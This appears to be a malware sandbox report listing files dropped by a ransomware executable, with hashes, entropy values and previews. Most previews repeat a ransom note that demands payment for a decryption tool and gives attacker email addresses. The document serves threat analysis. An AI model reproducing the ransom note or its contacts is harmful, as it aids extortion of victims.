                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):313
                                                                                                                                              Entropy (8bit):7.248719577071347
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:WlJyfLYrm0gIiHdSSQACAOXNETVGWBAi8trfSFsKIcfaylXUkPn:ayfL8meyu9AMWA0H8trfssKRyylRn
                                                                                                                                              MD5:9B2DFE2F89CA09B4062231AA425FD9C4
                                                                                                                                              SHA1:F9503D56826D121DFF9FA5732AD26C3959A704EE
                                                                                                                                              SHA-256:AE353976952A45F35D53482243A6C252C580732FAB601D2AB1DDC114ECBF36F8
                                                                                                                                              SHA-512:0388FE5409A8AB1104109C56DBF046F8F51E4545226EA21B61EB72DE4AF2B52DB07777A0EBFEBB99E561743E83B0D01AFC7E9431BB69EA628A0ED90C586BB467
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.....Q.2..f..&.1.'......\#D..(.stUse": null.}.X..$.~ R.3.........q.f./J.:}.....`...........T.....*.ZP...U'... ..%..}....<}.\.....o.a.g.....?....Y....._...$.,..oF...c. ..p..M.1c..##.V....0.G....;D.|Doo.&..:..g..\I..O.".`...........:Q..Y:.4..T...J._[-eMf.1@. ..[...+c..no......R.n4..Yoa.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):313
                                                                                                                                              Entropy (8bit):7.248719577071347
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:WlJyfLYrm0gIiHdSSQACAOXNETVGWBAi8trfSFsKIcfaylXUkPn:ayfL8meyu9AMWA0H8trfssKRyylRn
                                                                                                                                              MD5:9B2DFE2F89CA09B4062231AA425FD9C4
                                                                                                                                              SHA1:F9503D56826D121DFF9FA5732AD26C3959A704EE
                                                                                                                                              SHA-256:AE353976952A45F35D53482243A6C252C580732FAB601D2AB1DDC114ECBF36F8
                                                                                                                                              SHA-512:0388FE5409A8AB1104109C56DBF046F8F51E4545226EA21B61EB72DE4AF2B52DB07777A0EBFEBB99E561743E83B0D01AFC7E9431BB69EA628A0ED90C586BB467
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....Q.2..f..&.1.'......\#D..(.stUse": null.}.X..$.~ R.3.........q.f./J.:}.....`...........T.....*.ZP...U'... ..%..}....<}.\.....o.a.g.....?....Y....._...$.,..oF...c. ..p..M.1c..##.V....0.G....;D.|Doo.&..:..g..\I..O.".`...........:Q..Y:.4..T...J._[-eMf.1@. ..[...+c..no......R.n4..Yoa.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):341
                                                                                                                                              Entropy (8bit):7.422403250244542
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:qehGvCu+03Y9eUTyIo4DmkmEk+A+7Edk7MOAGyB+NHxYrQASSn:qBN+wY9eUT/NnmJ+7EgANB0HxY8xSn
                                                                                                                                              MD5:98C14027F69CC4BA826E92AF895013A6
                                                                                                                                              SHA1:09B7BAF020FBAF0EB52ED12AF4321E692AF23F94
                                                                                                                                              SHA-256:8D300E7A75EDE6B61AA2871049C86844C9D075CF68A04316FAB9B14E96F74612
                                                                                                                                              SHA-512:4900EFB513C27C892EA90848314E5825FCB79A6DAF51DD84CE39DC66D678E094B43882E9F43CBCFC471F1C11FA4F9B7144B7E7F2F800C20728226CA0533267F4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..1.?-..r....[...L..v..P.N.]8._.nmA........ S..D..@G.n}..H...ocked=1....8.a....gP...bw.k.c.t...<..?..A...Z.s.o..{.8E9.e.=..@.<..e/...T.b.J..j;..|{.~.u.A$..Y.p.-......[...>^!X.......v..........4r..b.PZ_.~....Z....^.L_7W.....1Fr)[..-.,[..VTt.Bu..o.w$R[.w.u..`.%.....U..P...t-(*.{.(..>...vN..........F..`.s..%.y..i. V*.3S.x0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):341
                                                                                                                                              Entropy (8bit):7.422403250244542
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:qehGvCu+03Y9eUTyIo4DmkmEk+A+7Edk7MOAGyB+NHxYrQASSn:qBN+wY9eUT/NnmJ+7EgANB0HxY8xSn
                                                                                                                                              MD5:98C14027F69CC4BA826E92AF895013A6
                                                                                                                                              SHA1:09B7BAF020FBAF0EB52ED12AF4321E692AF23F94
                                                                                                                                              SHA-256:8D300E7A75EDE6B61AA2871049C86844C9D075CF68A04316FAB9B14E96F74612
                                                                                                                                              SHA-512:4900EFB513C27C892EA90848314E5825FCB79A6DAF51DD84CE39DC66D678E094B43882E9F43CBCFC471F1C11FA4F9B7144B7E7F2F800C20728226CA0533267F4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..1.?-..r....[...L..v..P.N.]8._.nmA........ S..D..@G.n}..H...ocked=1....8.a....gP...bw.k.c.t...<..?..A...Z.s.o..{.8E9.e.=..@.<..e/...T.b.J..j;..|{.~.u.A$..Y.p.-......[...>^!X.......v..........4r..b.PZ_.~....Z....^.L_7W.....1Fr)[..-.,[..VTt.Bu..o.w$R[.w.u..`.%.....U..P...t-(*.{.(..>...vN..........F..`.s..%.y..i. V*.3S.x0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):571
                                                                                                                                              Entropy (8bit):7.602713932565016
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:5CJKj1rhBIbWQEtIXltTEJwPVcGfn6z6vZuyx6GELy379n7InTz1wn:Rj1rhBFQEmDTSwPVcGfnISZNfETz1w
                                                                                                                                              MD5:52BD859363033A43BFA8CB2C15D6D944
                                                                                                                                              SHA1:2EF788F6429DD205CBC0906B88C4C6F48ED42BE9
                                                                                                                                              SHA-256:7A0A65502C3C8EC5FAD085B5610C34CC11A2542F4C0BB4593FA6B75603F55EC9
                                                                                                                                              SHA-512:BF5B55419309566CB0103ACC45C200ED04F5EB23C22808B0B8894C3F36389423255A5C4856BF694AE7D1DD2BA93E24927701D661FADCA2D1D1438C2B847D3863
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:&....Q..!.IT.B{....T...........J...../.........FsJ.......y.*..O8..N.)"...b...u.[....y..0A....?.p..D..,...2|.......<aK/...\.Q.v...,P}R..(..=iN...[.(t....1.;.W)W......a.u.u;.W........S.C.<......./.i..U$.......H.7D;..cu.@....B.W...G.]f...sX....j....k..(.E..Z..bwCf..-.G*.Z.S...BL.....(..d2x...Q.").>....8...I...H.>h.g.&........QY..v..R'..[+.T.G..d.E;.vu..p..".[.@=.?...:Cy...P...h~..w[.2.....C....@p.y"()....H.{ts..k....2v.L..P.s.`...j.Jk...0...m.._2......f..cs......7.......W ...N...#(v.z.H.^.i...s....T..!s....#V..cq.?.....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):571
                                                                                                                                              Entropy (8bit):7.602713932565016
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:5CJKj1rhBIbWQEtIXltTEJwPVcGfn6z6vZuyx6GELy379n7InTz1wn:Rj1rhBFQEmDTSwPVcGfnISZNfETz1w
                                                                                                                                              MD5:52BD859363033A43BFA8CB2C15D6D944
                                                                                                                                              SHA1:2EF788F6429DD205CBC0906B88C4C6F48ED42BE9
                                                                                                                                              SHA-256:7A0A65502C3C8EC5FAD085B5610C34CC11A2542F4C0BB4593FA6B75603F55EC9
                                                                                                                                              SHA-512:BF5B55419309566CB0103ACC45C200ED04F5EB23C22808B0B8894C3F36389423255A5C4856BF694AE7D1DD2BA93E24927701D661FADCA2D1D1438C2B847D3863
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:&....Q..!.IT.B{....T...........J...../.........FsJ.......y.*..O8..N.)"...b...u.[....y..0A....?.p..D..,...2|.......<aK/...\.Q.v...,P}R..(..=iN...[.(t....1.;.W)W......a.u.u;.W........S.C.<......./.i..U$.......H.7D;..cu.@....B.W...G.]f...sX....j....k..(.E..Z..bwCf..-.G*.Z.S...BL.....(..d2x...Q.").>....8...I...H.>h.g.&........QY..v..R'..[+.T.G..d.E;.vu..p..".[.@=.?...:Cy...P...h~..w[.2.....C....@p.y"()....H.{ts..k....2v.L..P.s.`...j.Jk...0...m.._2......f..cs......7.......W ...N...#(v.z.H.^.i...s....T..!s....#V..cq.?.....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.182523367648434
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:mYuMah4HuoJwdxt8ZBAKzjAjB8HoBlVosZICR4z0+12UjmkSn:eV4HuaY6BvYuHoJosam4g+/mkSn
                                                                                                                                              MD5:3D14BD94E507A8BCAF0270350AA7C3E0
                                                                                                                                              SHA1:D97484E3FB2824F588481748CDD7A50E95ADB168
                                                                                                                                              SHA-256:0BE24A7674C139E5CDD9E3904550645DFCC0AA0C73DC6127564F271B8EAEA82D
                                                                                                                                              SHA-512:2DE5F268631AA5BFECD33479EAA56B478DE3BC15582492119A698B127E7EF6A528E32DBE3C6421457B5FF22EE8862153DAFB482F6650C5542690DE0447537862
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:....gC.v...@.D................*.. . .(#.K......[s..T..<-...`{......j.......hn..j0-N..Tq#...\..y...1..pz..?..n...N...P1`.&5....PP...>Y.....s..k).;...z.*.$M..w...I......i....U..3.E.VX..Cm....>.j.{.]...Q....yA~....]N......M.Jv.lY....V...A.........=.N.=Q.t\=}V.C.d..1..',0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.840910609667376
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:KThcolhFIbJdbWQ3AuKP2n+A8oFPou6ntXiES1diGg02:KThcKQb2QYP23Q1gf4GQ
                                                                                                                                              MD5:40533E97329CF865F4650FFC247A9491
                                                                                                                                              SHA1:C4ADE112CD4614C3B0A347576FD89840319CAD24
                                                                                                                                              SHA-256:7689D48ED7BC9991E4884A994B4D1B8AF6309A24CF4FF43997A3113B2E46AB45
                                                                                                                                              SHA-512:02683DAB86D6FA18D41DB3FEF2A8123FA069288EBF53DB1C9B96A482B77479D23A04BF0D8B39291911E7EA02E6626972CBC0EE368168C7DBC14153C495F70292
                                                                                                                                              Malicious:false
